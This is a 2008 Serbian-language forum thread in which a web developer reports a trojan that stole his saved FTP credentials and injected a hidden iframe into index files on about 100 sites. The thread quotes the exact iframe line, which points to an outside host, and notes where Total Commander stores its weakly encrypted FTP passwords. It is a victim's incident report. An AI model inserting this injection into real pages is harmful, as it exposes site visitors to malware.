Web Hosting, web serveri i operativni sistemi Komercijalni hosting, web serveri, bezbednost, operativni sistemi na serverima |
|
Alati teme | Način prikaza |
|
09. 04. 2008. | #1 |
expert
Expert
Datum učlanjenja: 27.11.2005
Poruke: 543
Hvala: 47
57 "Hvala" u 31 poruka
|
"Rasturio" me virus / trojanac
Ne bih zeleo da se ovo nekom desi. :-(
Nekako sam zapatio trojanca koji ima tu osobinu da skupi FTP sifre koje su snimljene u nekom od FTP programa (u mom slucaju, radi se o Total Commanderu) i salje ih na neki udaljeni (zarazeni) racunar. U mom slucaju, to je jedno 100-tinak sajtova. :-( Dalje, udaljeni racunar se kaci na FTP i preuzima fajlove koji imaju index u svom nazivu, bez obzira na ekstenziju. Lokalno na racunaru menja sadrzaj fajlova i na dnu dodaje Kôd:
<!-- ~ --><iframe src="http://orentraff.cn/in.cgi?3" width="0" height="0" style="display:none"></iframe><!-- ~ --> Posle toga uredno uploaduje taj fajl na FTP. Ponekad se desi da ostavi fajl main.php koji je "klasicna" skripta za remote upravljanje sajtom. Glavni problem je sto ovaj trojanac "ne radi" sve kako treba, tako da se desi da uploaduje isecen fajl ili da u potpunosti prepise sadrzaj *index*.* fajlova iframe kodom. A desilo se da se html fajl od jednog klijenta preseli kod drugog. Da li se neko sretao sa necim slicnim? |
09. 04. 2008. | #2 |
Nikola Denić
Sir Write-a-Lot
|
au kako bih ja bio mrtav da se to meni desilo tj mozda i ne bih , ali imam osecaj da bi imao jako uznemiravajuce pozive
__________________
Do not ask yourself what the world needs. Ask yourself what makes you come alive, and then go do that. Because what the world needs is people who have come alive |
09. 04. 2008. | #3 |
Ivan Dilber
Sir Write-a-Lot
|
kako se zove virus?
i kako provali passworde iz FTP programa, zar TC ne enkodira te podatke nekako ?
__________________
Leadership is the art of getting people to want to do what you know must be done. |
09. 04. 2008. | #4 |
Nikola Denić
Sir Write-a-Lot
|
ma jok, cist text file
__________________
Do not ask yourself what the world needs. Ask yourself what makes you come alive, and then go do that. Because what the world needs is people who have come alive |
09. 04. 2008. | #5 |
profesionalac
Qualified
|
pisao sam o tome u ovoj temi, zajebana stvar
http://www.devprotalk.com/showthread...ght=virus+koji |
09. 04. 2008. | #6 |
expert
Grand Master
|
brrrrr
odoh odmah da vidim imam li negde IKAKWE nekriptirane lozinke (mislim da ne) kad smo kod toga, jel neko koristi neki password manager jes da stavljas sva jaja u jedan kosh, al ako je taj kosh dobar, mozda je bolje no ono sto sad imamo: lozinke u Firefox, lozinke u FTP u Thunderbird itd ... |
09. 04. 2008. | #7 |
Designer guy
Wrote a book
|
Yup, video sam nekoliko takvih primera. Doduse, nisu se meni licno desavali, ali su bili prisutni na projektima na kojima sam radio. U stvari lazem, jednom mi se nesto slicno desilo na DE kada je ubacio neki Top 50 Sites JS, Rusi neki majku im...
|
09. 04. 2008. | #8 |
I think I'm a sofa...
Professional
Datum učlanjenja: 16.11.2005
Poruke: 438
Hvala: 9
28 "Hvala" u 25 poruka
|
TC cuva sve FTP podatke u wcx_ftp.ini koji se nalazi u Windows direktorijumu.
Lozinke jesu kriptovane ali po broju programicica kojih ima za razbijanje i koliko malo vremena treba za to, enkripcija nije bog zna kako jaka. |
09. 04. 2008. | #9 |
Ivan Dilber
Sir Write-a-Lot
|
mislim da cu da krenem da kucam passworde umesto da ih snimam
__________________
Leadership is the art of getting people to want to do what you know must be done. |
09. 04. 2008. | #10 |
majstor
Wrote a book
|
|
|
|
Slične teme | ||||
Tema | Početna poruka teme | Forum | Odgovori | Poslednja poruka |
301 redirkecija "dinamickog" URLa na "dinamicki" URL | mb_sa | Regular expression i htaccess | 7 | 02. 07. 2008. 20:21 |
Karakteri "&" i "=" i XMLHttpRequest | Milos Vukotic | Regular expression i htaccess | 18 | 01. 10. 2007. 16:16 |
If IT really is a "profession", what is our "pro bono" contribution as IT pros? | oksite | e-Business | 26 | 12. 01. 2007. 12:18 |
"Telekom Slovenije" preuzeo "Blic.net" za 390.000 evra | Aleksandar Marković | Komunikacije | 2 | 23. 12. 2006. 15:23 |